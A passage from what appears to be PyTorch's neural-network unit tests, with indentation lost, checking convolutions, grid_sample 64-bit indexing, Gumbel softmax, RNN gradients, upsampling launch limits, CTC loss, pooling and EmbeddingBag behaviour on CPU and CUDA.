input_large = torch.randn(1, 2, 1024, 1024 * 1024, dtype=dtype, device=device)
conv1(input_large)
conv2 = torch.nn.Conv2d(1, 1024, 1, 1).to(device).to(dtype)
input_large = torch.randn(1, 1, 2048, 1024 , dtype=dtype, device=device)
conv2(input_large)
def test_conv_noncontig_weights(self, device):
for dim in (1, 2, 3):
for grouped in (False, True):
nc = 3
groups = 3 if grouped else 1
w = torch.randn([3] * dim, device=device)
w = w.expand([nc, int(nc / groups)] + list(w.shape))
w = w.detach().requires_grad_()
x = torch.randn([1, nc] + ([5] * dim), device=device, requires_grad=True)
y = getattr(F, 'conv{}d'.format(dim))(x, w, groups=groups)
y.sum().backward()
y = getattr(F, 'conv_transpose{}d'.format(dim))(x, w, groups=groups)
y.sum().backward()
def test_conv_noncontig_weights_and_bias(self, device):
# need floats to exercise https://github.com/pytorch/pytorch/issues/16018
for bias in [True, False]:
conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=bias).to(device, torch.float)
input_nc = torch.randn((1, 3, 224, 224, 2), device=device, dtype=torch.float)[:, :, :, :, 1]
input_c = input_nc.contiguous()
weight_nc = torch.randn((64, 3, 7, 7, 2), device=device, dtype=torch.float)[:, :, :, :, 1]
conv1.weight = nn.Parameter(weight_nc)
weight_c = conv1.weight.contiguous()
if bias:
bias_nc = torch.randn((64, 2), device=device, dtype=torch.float)[:, 1]
conv1.bias = nn.Parameter(bias_nc)
bias_c = conv1.bias.contiguous()
out1 = conv1(input_nc)
conv1.weight = nn.Parameter(weight_c)
if bias:
conv1.bias = nn.Parameter(bias_c)
out2 = conv1(input_c)
self.assertEqual(out1, out2)
def test_save_lstm_compatibility(self, device):
# Test that saving an LSTM in PyTorch 1.7 and older can still be
# loaded in newer versions of PyTorch.
model = nn.LSTM(2, 3)
x = torch.randn(32, 5, 2)
expected = model(x)
# Get a state dict for PyTorch 1.7 LSTM. Before PyTorch 1.8, proj_size
# didn't exist.
assert model.proj_size == 0
state_dict = model.__dict__
del state_dict['proj_size']
# load a model
loaded_model = nn.LSTM(2, 3)
loaded_model.__setstate__(state_dict)
result = loaded_model(x)
self.assertEqual(result, expected)
@onlyCUDA
@tf32_on_and_off(0.005)
def test_grid_sample_large(self, device):
def issue_35202():
input_tensor = torch.rand(1, 1, 480, 640, dtype=torch.float, device=device, requires_grad=True)
coords = torch.tensor([[-10059144, 67680944], [67680944, 67680944]], dtype=torch.float, device=device)
coords = coords.unsqueeze(0).unsqueeze(0).repeat(1, 1, 1, 1)
result = torch.nn.functional.grid_sample(input_tensor, coords)
self.assertEqual(result, torch.tensor([[[[0., 0.]]]], dtype=torch.float, device=device))
result.backward(torch.ones_like(result))
torch.cuda.synchronize()
issue_35202()
def issue_24823_1(dtype):
image = torch.arange(27, 0, -1, dtype=dtype, device=device).view(1, 1, 3, 3, 3)
image.requires_grad_()
grid = torch.nn.functional.affine_grid(
torch.tensor([[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0]]], dtype=dtype, device=device),
(1, 1, 3, 3, 3))
grid[:, 1, 1, 1, 0] = float('inf')
result = torch.nn.functional.grid_sample(image, grid, padding_mode='zeros')
self.assertEqual(result, torch.tensor([[[[[27., 26., 25.], [24., 23., 22.], [21., 20., 19.]],
[[18., 17., 16.], [15., 0., 13.], [12., 11., 10.]],
[[9., 8., 7.], [6., 5., 4.], [3., 2., 1.]]]]],
device=device, dtype=dtype))
result.backward(torch.ones_like(result))
expected_grad = torch.ones_like(image)
expected_grad[0, 0, 1, 1, 1] = 0
self.assertEqual(image.grad, expected_grad, atol=0.005, rtol=0)
issue_24823_1(torch.half)
issue_24823_1(torch.float)
issue_24823_1(torch.double)
def issue_24823_2():
param = torch.tensor([[[-1.0e+20, 0.0, 0.0], [0.0, -1.0e+20, 0.0]]], dtype=torch.float, device=device)
img = torch.zeros((1, 1, 4, 4), dtype=torch.float, device=device, requires_grad=True)
grid = torch.nn.functional.affine_grid(param, img.size())
result = torch.nn.functional.grid_sample(img, grid)
self.assertEqual(result, torch.zeros(1, 1, 4, 4, device=device, dtype=torch.float))
result.backward(torch.ones_like(result))
torch.cuda.synchronize()
issue_24823_2()
@dtypes(torch.float, torch.double)
@largeTensorTest(lambda self, device, dtype:
# Compute sum of the large tensor sizes:
# (im.numel() + small_image.numel() + small_image.grad.numel() +
# large_view.grad.numel()) * sizeof(dtype)
32769 * (65536 + 3 * 65536 / 128) *
torch.tensor([], dtype=dtype).element_size())
def test_grid_sample_large_index_2d(self, device, dtype):
# Test 64-bit indexing with grid_sample (gh-41656)
# Try accessing the corners, there should be no segfault
coords = torch.tensor([[[-1., -1.],
[+1., -1.]],
[[-1., +1.],
[+1., +1.]]], device=device, dtype=dtype)
coords = coords.expand(1, 2, 2, 2)
im = torch.zeros([1, 1, 32769, 65536], device=device, dtype=dtype)
# Compare sampling with large strides to the same op on a contiguous tensor
coords = torch.rand(1, 4, 4, 2, device=device, dtype=dtype)
large_view = im[..., 127::128]
small_image = torch.rand_like(large_view)
large_view[...] = small_image
large_view.requires_grad, small_image.requires_grad = True, True
self.assertTrue(
sum(i * s for i, s in zip(large_view.size(), large_view.stride())) >= 2 ** 31,
msg="View must use 64-bit indexing")
for mode, padding_mode, align_corners in itertools.product(
('nearest', 'bilinear', 'bicubic'), ('zeros', 'border', 'reflection'), (True, False)):
a = F.grid_sample(
small_image, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
a.sum().backward()
b = F.grid_sample(
large_view, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
b.sum().backward()
self.assertEqual(a, b)
self.assertEqual(small_image.grad, large_view.grad)
small_image.grad.zero_()
large_view.grad.zero_()
@dtypes(torch.float, torch.double)
@largeTensorTest(lambda self, device, dtype:
# Compute sum of the large tensor sizes:
# (im.numel() + small_image.numel() + small_image.grad.numel() +
# large_view.grad.numel()) * sizeof(dtype)
2 * 32769 * (32768 + 3 * 32768 / 128) *
torch.tensor([], dtype=dtype).element_size())
def test_grid_sample_large_index_3d(self, device, dtype):
# Test 64-bit indexing with grid_sample (gh-41656)
# Try accessing the corners, there should be no segfault
coords = torch.full((1, 2, 2, 2, 3), 1., device=device, dtype=dtype)
im = torch.zeros([1, 1, 2, 32769, 32768], device=device, dtype=dtype)
result = F.grid_sample(im, coords, align_corners=False)
self.assertEqual(result, torch.zeros((1, 1, 2, 2, 2), device=device, dtype=dtype))
# Compare sampling with large strides to the same op on a contiguous tensor
coords = torch.rand(1, 1, 4, 4, 3, device=device, dtype=dtype)
large_view = im[..., 127::128]
small_image = torch.rand_like(large_view)
large_view[...] = small_image
small_image.requires_grad, large_view.requires_grad = True, True
self.assertTrue(
sum(i * s for i, s in zip(large_view.size(), large_view.stride())) >= 2 ** 31,
msg="View must use 64-bit indexing")
for mode, padding_mode, align_corners in itertools.product(
('nearest', 'bilinear'), ('zeros', 'border', 'reflection'), (True, False)):
a = F.grid_sample(
small_image, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
a.sum().backward()
b = F.grid_sample(
large_view, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
b.sum().backward()
self.assertEqual(a, b)
self.assertEqual(small_image.grad, large_view.grad)
small_image.grad.zero_()
large_view.grad.zero_()
@onlyCUDA
@largeTensorTest('12GB')
def test_conv_transposed_large(self, device):
dtype = torch.half if self.device_type == 'cuda' else torch.float
conv = nn.ConvTranspose2d(1, 1, 1, 1, bias=False).to(device).to(dtype)
input_large = torch.randn(4096, 1, 512, 1024, dtype=dtype, device=device)
# forward
ret = conv(input_large)
maxdiff0 = (ret.narrow(0, 0, 1024) - conv(input_large.narrow(0, 0, 1024))).abs_().max().item()
maxdiff1 = (ret.narrow(0, 1024, 1024) - conv(input_large.narrow(0, 1024, 1024))).abs_().max().item()
maxdiff2 = (ret.narrow(0, 2048, 1024) - conv(input_large.narrow(0, 2048, 1024))).abs_().max().item()
maxdiff3 = (ret.narrow(0, 3072, 1024) - conv(input_large.narrow(0, 3072, 1024))).abs_().max().item()
self.assertEqual(maxdiff0, 0)
self.assertEqual(maxdiff1, 0)
self.assertEqual(maxdiff2, 0)
self.assertEqual(maxdiff3, 0)
@onlyCUDA
@skipCUDAIfRocm
@largeTensorTest('12GB')
def test_conv_large(self, device):
dtype = torch.half if self.device_type == 'cuda' else torch.float
conv = nn.Conv2d(2, 2, 8, 8, bias=False).to(device).to(dtype)
input_large = torch.randn(4097, 2, 512, 512, dtype=dtype, device=device)
# forward
ret = conv(input_large)
self.assertEqual(ret[:2048], conv(input_large[:2048]))
self.assertEqual(ret[2048:4096], conv(input_large[2048:4096]))
self.assertEqual(ret[4096:], conv(input_large[4096:]))
# backward
conv.zero_grad()
# When computing the backward, we are using the `max(dim=1)`` to create
# some sparsity. Without this sparsity, the rounding error would be
# too large (as large as 1e-5) to satisfy the creterion (1e-6) of `assertEqual`
ret.view(4097, -1).max(dim=1).values.sum().backward()
del ret
grad1 = conv.weight.grad.detach().clone()
conv.zero_grad()
conv(input_large[:2048]).view(2048, -1).max(dim=1).values.sum().backward()
conv(input_large[2048:4096]).view(2048, -1).max(dim=1).values.sum().backward()
conv(input_large[4096:]).view(1, -1).max(dim=1).values.sum().backward()
grad2 = conv.weight.grad.detach().clone()
# gradients are at the order of hundreds, we need to scale it to
# the order of one so that we can compare
scale = 1 / grad1.abs().mean()
grad1 = grad1 * scale
grad2 = grad2 * scale
self.assertEqual(grad1, grad2)
def _test_gumbel_softmax_st_shapes(self, device, dtype, shape, dim, count_expected):
logits = torch.randn(shape, dtype=torch.float, device=device)
logits = logits.to(dtype)
y_draw = F.gumbel_softmax(logits, hard=True, dim=dim)
# All values positive
self.assertGreaterEqual(y_draw.min(), 0)
# Shape unchanged
self.assertTrue(y_draw.shape == logits.shape)
# One choice per draw
self.assertEqual(y_draw.sum(), count_expected, atol=torch.finfo(y_draw.dtype).eps, rtol=0)
def _test_gumbel_softmax_straight_through(self, device, dtype):
num_draws = 100
logits = torch.tensor([[0.2, 0.8, 0.1]], device=device)
logits = logits.reshape([1, 3])
logits = logits.to(dtype).requires_grad_()
probs = logits.softmax(dim=-1)
counts = torch.zeros_like(logits)
for _ in range(num_draws):
y_draw = F.gumbel_softmax(logits, hard=True)
counts = counts + y_draw
# All values positive
self.assertGreaterEqual(y_draw.min(), 0)
# Each experiment should result in 1 draw.
self.assertEqual(counts.sum(), num_draws, atol=torch.finfo(counts.dtype).eps, rtol=0)
# check results is asymptotically as expected.
expected = probs * num_draws
# ~z is approximately N(0,1) for unbiased count
z = (counts - expected) / (expected * (1 - probs)).sqrt()
# A (lazy) approximate 99% two-sided test:
# occurs with prob alpha~>=0.01 if unbiased
self.assertLess(z.abs().max().item(), 2.58)
def _test_gumbel_softmax_grad(self, device, dtype):
# "hard" and "not hard" should propagate same gradient.
logits_soft = torch.zeros(10, 10, dtype=dtype, device=device, requires_grad=True)
logits_hard = torch.zeros(10, 10, dtype=dtype, device=device, requires_grad=True)
seed = torch.random.get_rng_state()
y_soft = F.gumbel_softmax(logits_soft, hard=False)
torch.random.set_rng_state(seed)
y_hard = F.gumbel_softmax(logits_hard, hard=True)
y_soft.sum().backward()
y_hard.sum().backward()
# 2eps = 1x addition + 1x subtraction.
tol = 2 * torch.finfo(dtype).eps
self.assertEqual(logits_soft.grad, logits_hard.grad, atol=tol, rtol=0)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float, torch.double)
def test_gumbel_softmax(self, device, dtype):
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5], dim=0, count_expected=1)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5], dim=-1, count_expected=1)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5, 4], dim=1, count_expected=5)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5, 4, 3], dim=1, count_expected=5 * 3)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5, 4, 3], dim=-1, count_expected=5 * 4)
self._test_gumbel_softmax_straight_through(device, dtype)
self._test_gumbel_softmax_grad(device, dtype)
def _test_rnn_retain_variables(self, device, dtype):
rnns = [nn.LSTM(10, 20, num_layers=2).to(device, dtype),
nn.GRU(10, 20, num_layers=2).to(device, dtype),
nn.RNN(10, 20, num_layers=2).to(device, dtype)]
for rnn in rnns:
input = torch.randn(5, 6, 10, device=device, dtype=dtype, requires_grad=True)
output = rnn(input)
output[0].sum().backward(retain_graph=True)
grads = [input.grad.data.clone()] + [p.grad.data.clone() for p in rnn.parameters()]
for _ in range(4):
rnn.zero_grad()
input.grad.data.zero_()
output[0].sum().backward(retain_graph=True)
grads2 = [input.grad.data] + [p.grad.data for p in rnn.parameters()]
self.assertEqual(grads, grads2)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.double)
def test_rnn_retain_variables(self, device, dtype):
self._test_rnn_retain_variables(device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_rnn_retain_variables(device, dtype)
@onlyCUDA
def test_upsamplingNearest1d_launch_config(self, device):
m = nn.Upsample(scale_factor=2)
inp = torch.rand(2**25, 1, 1, device=device)
out = m(inp)
inp_ref = inp.cpu()
out_ref = m(inp_ref)
self.assertEqual(out_ref, out)
@onlyCUDA
def test_upsamplingNearest2d_launch_config(self, device):
m = nn.Upsample(scale_factor=2)
inp = torch.rand(2**25, 1, 1, 1, device=device)
out = m(inp)
inp_ref = inp.cpu()
out_ref = m(inp_ref)
self.assertEqual(out_ref, out)
@onlyCUDA
def test_upsamplingNearest3d_launch_config(self, device):
m = nn.Upsample(scale_factor=2)
inp = torch.rand(2**25, 1, 1, 1, 1, device=device)
out = m(inp)
inp_ref = inp.cpu()
out_ref = m(inp_ref)
self.assertEqual(out_ref, out)
@unittest.expectedFailure
@skipIfRocm
@onlyCUDA
def test_upsamplingNearest2d_launch_fail(self, device):
m = nn.Upsample(scale_factor=2)
# launch grid_y == 2**16 (larger than maximum y-dimension limit 65535)
inp = torch.rand(1, 1, 2**15, 2**8, device=device)
out = m(inp)
@onlyCUDA
@skipCUDAIfNotRocm
def test_upsamplingNearest2d_launch_rocm(self, device):
# test_upsamplingNearest2d_launch_fail should run OK on ROCm
m = nn.Upsample(scale_factor=2)
inp = torch.rand(1, 1, 2**15, 2**8, device=device)
out = m(inp)
@onlyCUDA
@skipCUDAIfCudnnVersionLessThan(7600)
def test_CTCLoss_cudnn(self, device):
def _helper(zero_infinity):
target_lengths = [30, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (sum(target_lengths),), dtype=torch.int)
log_probs = torch.randn(50, 3, 15, dtype=torch.float, device=device).log_softmax(2).requires_grad_()
log_probs_ref = log_probs.detach().clone().requires_grad_()
with torch.backends.cudnn.flags(enabled=True):
res = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, zero_infinity=zero_infinity)
res.backward()
expected = ctcloss_reference(log_probs, targets.cuda(), input_lengths, target_lengths).float()
with torch.backends.cudnn.flags(enabled=False):
res2 = torch.nn.functional.ctc_loss(log_probs_ref, targets.cuda().long(), input_lengths, target_lengths,
zero_infinity=zero_infinity)
res2.backward()
self.assertEqual(res, expected)
self.assertEqual(res2, res)
self.assertEqual(log_probs.grad, log_probs_ref.grad)
_helper(zero_infinity=True)
_helper(zero_infinity=False)
@onlyCUDA
@skipCUDAIfNoCudnn
def test_contig_wrong_stride_cudnn(self, device):
# x has to have batch_size 1 to test contiguous checks
x = torch.randn(1, 16, 5, 5, device=device)
stride = list(x.stride())
stride[0] = 20
# change the stride in dimension 0. the tensor is still contiguous because size[0] is 1
x.set_(x.storage(), 0, x.size(), stride)
self.assertTrue(x.is_contiguous())
F.conv_transpose2d(x, torch.randn(16, 1, 1, 1, device=device))
F.conv2d(x, torch.randn(1, 16, 1, 1, device=device))
@onlyCUDA
def test_Conv2d_size_1_kernel(self, device):
x_cpu = torch.randn(2, 3, 5, 5)
conv_cpu = torch.nn.Conv2d(3, 3, kernel_size=1)
y_cpu = conv_cpu(x_cpu)
y = torch.rand_like(y_cpu)
y_cpu.backward(y)
with cudnn.flags(enabled=False):
conv_cuda = torch.nn.Conv2d(3, 3, kernel_size=1).to(device)
conv_cuda.bias.data.copy_(conv_cpu.bias.data)
conv_cuda.weight.data.copy_(conv_cpu.weight.data)
y_cuda = conv_cuda(x_cpu.to(device))
y_cuda.backward(y.to(device))
self.assertEqual(y_cpu, y_cuda, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.bias.grad.data, conv_cuda.bias.grad.data, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.weight.grad.data, conv_cuda.weight.grad.data, atol=1e-5, rtol=0, exact_device=False)
@onlyCUDA
def test_ConvTranspose2d_size_1_kernel(self, device):
x_cpu = torch.randn(2, 3, 5, 5)
conv_cpu = torch.nn.ConvTranspose2d(3, 3, kernel_size=1)
y_cpu = conv_cpu(x_cpu)
y = torch.rand_like(y_cpu)
y_cpu.backward(y)
with cudnn.flags(enabled=False):
conv_cuda = torch.nn.ConvTranspose2d(3, 3, kernel_size=1).to(device)
conv_cuda.bias.data.copy_(conv_cpu.bias.data)
conv_cuda.weight.data.copy_(conv_cpu.weight.data)
y_cuda = conv_cuda(x_cpu.to(device))
y_cuda.backward(y.to(device))
self.assertEqual(y_cpu, y_cuda, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.bias.grad.data, conv_cuda.bias.grad.data, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.weight.grad.data, conv_cuda.weight.grad.data, atol=1e-5, rtol=0, exact_device=False)
@onlyCUDA
def test_ConvTranspose3d_size_1_kernel(self, device):
x_cpu = torch.randn(2, 3, 3, 5, 5)
conv_cpu = torch.nn.ConvTranspose3d(3, 3, kernel_size=1)
y_cpu = conv_cpu(x_cpu)
y = torch.rand_like(y_cpu)
y_cpu.backward(y)
with cudnn.flags(enabled=False):
conv_cuda = torch.nn.ConvTranspose3d(3, 3, kernel_size=1).to(device)
conv_cuda.bias.data.copy_(conv_cpu.bias.data)
conv_cuda.weight.data.copy_(conv_cpu.weight.data)
y_cuda = conv_cuda(x_cpu.to(device))
y_cuda.backward(y.to(device))
self.assertEqual(y_cpu, y_cuda, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.bias.grad.data, conv_cuda.bias.grad.data, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.weight.grad.data, conv_cuda.weight.grad.data, atol=1e-5, rtol=0, exact_device=False)
def _ordered_sequence(self, device, dtype):
"""Create ordered list of random sequences"""
seqs = [torch.empty(random.randint(1, 6), device=device, dtype=dtype)
for _ in range(5)]
seqs = [s.random_(-128, 128) for s in seqs]
ordered = sorted(seqs, key=len, reverse=True)
return ordered
def _padded_sequence(self, device, dtype):
"""Create Tensor of random padded sequences"""
ordered = self._ordered_sequence(device, dtype)
lengths = [len(i) for i in ordered]
padded_tensor = rnn_utils.pad_sequence(ordered)
return padded_tensor, lengths
@onlyCUDA
def test_device_mask(self, device):
for enforce_sorted in [True, False]:
padded, lengths = self._padded_sequence('cpu', torch.float)
packed = rnn_utils.pack_padded_sequence(
padded, lengths, enforce_sorted=enforce_sorted)
self.assertFalse(packed.is_cuda)
packed = packed.to(device)
self.assertTrue(packed.is_cuda)
unpacked, _ = rnn_utils.pad_packed_sequence(packed)
self.assertTrue(unpacked.is_cuda)
self.assertEqual(unpacked.dtype, torch.float)
@onlyCUDA
def test_overwrite_module_params_on_conversion_cpu_device(self, device):
# Test that under the current default settings
# (`torch.__future__.get_overwrite_module_params_on_conversion() == False`),
# a view to a module's parameters is not pointing to the same storage as
# its base variable after converting the module to a different device.
m = nn.Linear(20, 10)
mw = m.weight[:]
m.to(device)
with torch.no_grad():
# Without using `torch.no_grad()`, this will leak CUDA memory.
# (Issue is filed at https://github.com/pytorch/pytorch/issues/21875)
mw[0][0] = 5
self.assertTrue(mw[0][0].device.type == "cpu")
self.assertTrue(mw._base[0][0].device.type == "cuda")
try:
torch.__future__.set_overwrite_module_params_on_conversion(True)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# a view to a module's parameters is still pointing to the same storage as
# its base variable after converting the module to a different device.
m = nn.Linear(20, 10)
mw = m.weight[:]
m.to(device)
with torch.no_grad():
mw[0][0] = 5
self.assertTrue(mw[0][0] == mw._base[0][0])
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# `cpu_module.to("cuda")` doesn't preserve previous references to
# `cpu_module`'s parameters or gradients.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20)
weight_ref = m.weight
weight_grad_ref = m.weight.grad
m.to(device)
self.assertNotEqual(weight_ref.device, m.weight.device)
self.assertNotEqual(weight_grad_ref.device, m.weight.grad.device)
finally:
torch.__future__.set_overwrite_module_params_on_conversion(False)
@onlyCUDA
@dtypes(*ALL_TENSORTYPES2)
def test_embedding_max_norm_device(self, device, dtype):
embedding = nn.Embedding(22, 5, max_norm=1.0).to(device, dtype=dtype)
# nn.Embedding only takes LongTensor as input
input = torch.tensor([2, 8, 8, 6], device=device, dtype=torch.long)
output = embedding(input)
self.assertEqual(output[1], output[2])
self.assertTrue(output.data.norm(p=2, dim=1).le(1).all())
# Test fails on Vg20
@skipCUDAIfRocm
@onlyCUDA
@dtypes(torch.half, torch.float)
def test_softmax(self, device, dtype):
input = torch.rand(32, 100, device=device, dtype=dtype, requires_grad=True)
inputf = input.to(torch.float).detach().requires_grad_(True)
out = F.softmax(input, dim=-1, dtype=torch.float)
outf = F.softmax(inputf, dim=-1)
# should be bitwise equal
self.assertEqual(out, outf, atol=0, rtol=0)
gO = torch.empty_like(outf).uniform_()
out.backward(gO)
outf.backward(gO)
# should be bitwise equal
self.assertEqual(input.grad, inputf.grad.to(dtype), atol=0, rtol=0)
@onlyCUDA
def test_pool3d_size_one_feature_dim(self, device):
# Tests crazy strides for feature dim of size 1
x = torch.randn(7, 1, 5, 3, 2, device=device)
strange_strides = [30, 1234, 6, 2, 1]
y = x.as_strided(x.size(), strange_strides)
x = x.cpu().as_strided(x.size(), strange_strides)
to_test = {
'max_pool3d': lambda t: F.max_pool3d(t, (5, 1, 1), stride=(5, 1, 1)),
'avg_pool3d': lambda t: F.avg_pool3d(t, (5, 1, 1), stride=(5, 1, 1)),
}
for test, fn in to_test.items():
# Should not crash
out_y = fn(y)
out_x = fn(x)
self.assertEqual(out_y, out_x.to(device), msg=test)
@onlyCUDA
@largeTensorTest('6GB')
def test_pool3d_large_size_int64(self, device):
# See https://github.com/pytorch/pytorch/issues/52822
x = torch.randn(70, 32, 100, 100, 100, dtype=torch.half, device=device)
y = torch.nn.functional.max_pool3d(x, 5)
torch.cuda.synchronize()
ref_x = x.cpu().float() # max_pool3d_cpu is not implemented for half
ref_y = torch.nn.functional.max_pool3d(ref_x, 5)
self.assertEqual(y, ref_y, exact_dtype=False)
@onlyCUDA
def test_AvgPool3d_backward_after_cat_dim1_device(self, device):
# x has to have batch_size 1 to test contiguous checks
x = torch.randn(1, 3, 4, 4, 4, device=device, requires_grad=True)
y = F.avg_pool3d(x, kernel_size=3, padding=1, stride=2)
grad = torch.randn(y.size(), device=device)
# increase the stride in dimension 0. the tensor is still contiguous because size[0] is 1
stride = list(grad.stride())
stride[0] = stride[0] * 2
grad.set_(grad.storage(), 0, grad.size(), stride)
assert grad.is_contiguous()
y.backward(grad)
def test_pooling_size_empty(self, device):
t = torch.rand([1, 2, 3, 4], device=device)
self.assertRaises(RuntimeError, lambda: F.adaptive_avg_pool1d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_avg_pool2d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_avg_pool3d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_max_pool1d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_max_pool2d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_max_pool3d(t, []))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long)))
def test_embedding_bag_empty_input(self, device, dtypes):
m = 4
n = 3
x = torch.tensor([], device=device, dtype=dtypes[0])
for sparse in [True, False]:
Embed = torch.nn.EmbeddingBag(m, n, sparse=sparse)
Embed.to(device)
output = Embed(input=x, offsets=torch.tensor([0], device=device, dtype=dtypes[1]))
self.assertEqual(output, torch.zeros_like(output))
output = Embed(input=x, offsets=torch.tensor([0, 0], device=device, dtype=dtypes[1]))
self.assertEqual(output, torch.zeros_like(output))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long)))
def test_EmbeddingBag_per_sample_weights_failures(self, device, dtypes):
# Failure 1: mismatched embeddings / per_sample_weights dtype
es = nn.EmbeddingBag(5, 2, mode='sum').to(dtype=torch.float, device=device)
input = torch.tensor([3, 1, 1, 1, 4, 0], dtype=dtypes[0], device=device)
offsets = torch.tensor([0, 0, 3, 3, 6], dtype=dtypes[1], device=device)
per_sample_weights = torch.randn_like(input, dtype=torch.double, device=device)
if device == 'cpu':
with self.assertRaisesRegex(RuntimeError, 'have the same type as'):
es(input, offsets, per_sample_weights)
else:
with self.assertRaisesRegex(RuntimeError, 'expected scalar type'):
es(input, offsets, per_sample_weights)
# Failure 2.1: input/per_sample_weights have different sizes (1d input)
input = torch.tensor([3, 1, 1, 1, 4, 0], dtype=dtypes[0], device=device)
offsets = torch.tensor([0, 0, 3, 3, 6], dtype=dtypes[1], device=device)
per_sample_weights = torch.randn(5, dtype=torch.float, device=device)
with self.assertRaisesRegex(ValueError, 'same shape as the input'):
es(input, offsets, per_sample_weights)
# Failure 2.2: input/per_sample_weights have different sizes (2d input)
input = torch.randint(5, (7, 3), dtype=dtypes[0], device=device)
offsets = None
per_sample_weights = torch.randn(7 * 3, dtype=torch.float, device=device)
with self.assertRaisesRegex(ValueError, 'same shape as the input'):
es(input, offsets, per_sample_weights)
# Failure 3: Unsupported per_sample_weights and mode=('max', 'mean')
for unsupported_mode in ('max', 'mean'):
es = nn.EmbeddingBag(5, 2, mode=unsupported_mode).to(
dtype=torch.float, device=device)
input = torch.randint(5, (7, 3), dtype=dtypes[0], device=device)
offsets = None
per_sample_weights = torch.randn(7, 3, dtype=torch.float, device=device)
with self.assertRaisesRegex(NotImplementedError,
"only supported for mode='sum'"):
es(input, offsets, per_sample_weights)
def _embedding_bag_reference_impl(self, input, weight, offsets=None, mode='sum',
per_sample_weights=None, include_last_offset=False):
assert mode == 'sum' or per_sample_weights is None
assert offsets is not None
if per_sample_weights is None:
per_sample_weights = torch.ones(input.size()).to(
dtype=weight.dtype, device=weight.device
)
assert input.numel() == per_sample_weights.numel()
bags = []
long_input = input.to(torch.long)
embeddings = weight.index_select(0, long_input) * per_sample_weights.unsqueeze(1)
if include_last_offset:
for index in range(len(offsets) - 1):
offset = offsets[index]
next_offset = offsets[index + 1]
length = next_offset - offset
if length == 0:
bags.append(
torch.tensor([0] * weight.size(1)).to(
dtype=embeddings.dtype, device=embeddings.device
)
)
else:
if mode == 'sum':
bags.append(embeddings.narrow(0, offset, length).sum(0))
elif mode == 'mean':
bags.append(embeddings.narrow(0, offset, length).sum(0).div(length))
else:
assert mode == 'max'
bags.append(embeddings.narrow(0, offset, length).max(0)[0])
else:
for index, offset in enumerate(offsets):
if index + 1 < len(offsets):
next_offset = offsets[index + 1]
else:
next_offset = len(long_input)
length = next_offset - offset
if length == 0:
bags.append(
torch.tensor([0] * weight.size(1)).to(
dtype=embeddings.dtype, device=embeddings.device
)
)
else:
if mode == 'sum':
bags.append(embeddings.narrow(0, offset, length).sum(0))
elif mode == 'mean':
bags.append(embeddings.narrow(0, offset, length).sum(0).div(length))
else:
assert mode == 'max'
bags.append(embeddings.narrow(0, offset, length).max(0)[0])
return torch.stack(bags)
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_empty_per_sample_weights_and_offsets(self, device, dtypes):
# Test empty input and per sample weight, and backward pass. There was a CUDA
# invalid configuration bug (more context in #46572)
def test_per_sample_weights(mode, trainable_scale):
es = nn.EmbeddingBag(5, 2, mode=mode).to(dtype=dtypes[2], device=device)
es.weight.data.copy_(
torch.arange(1, 11, device=device, dtype=dtypes[2]).view_as(es.weight))
input = torch.tensor([], device=device, dtype=dtypes[0])
offsets = torch.tensor([0, 0, 0, 0, 0], device=device, dtype=dtypes[1])
per_sample_weights = torch.randn_like(input, dtype=dtypes[2]) \
.requires_grad_(trainable_scale)
ref_per_sample_weights = \
per_sample_weights.detach().requires_grad_(trainable_scale)
reference_weights = es.weight.detach().requires_grad_()
expected = self._embedding_bag_reference_impl(
input, reference_weights, offsets, mode, ref_per_sample_weights)
result = es(input, offsets, per_sample_weights)
self.assertEqual(result, expected, atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
grad = torch.randn_like(expected)
result.backward(grad)
# the reference impl doesn't have grad fn for empty input; but the grad should
# simply be a zero tensor
ref_weights_grad = torch.zeros_like(es.weight)
self.assertEqual(es.weight.grad, ref_weights_grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
if trainable_scale:
ref_per_sample_weights_grad = torch.empty_like(per_sample_weights)
self.assertEqual(per_sample_weights.grad, ref_per_sample_weights_grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
modes = ('sum',)
trainable_scale = (True, False)
for mode, trainable in itertools.product(modes, trainable_scale):
test_per_sample_weights(mode, trainable)
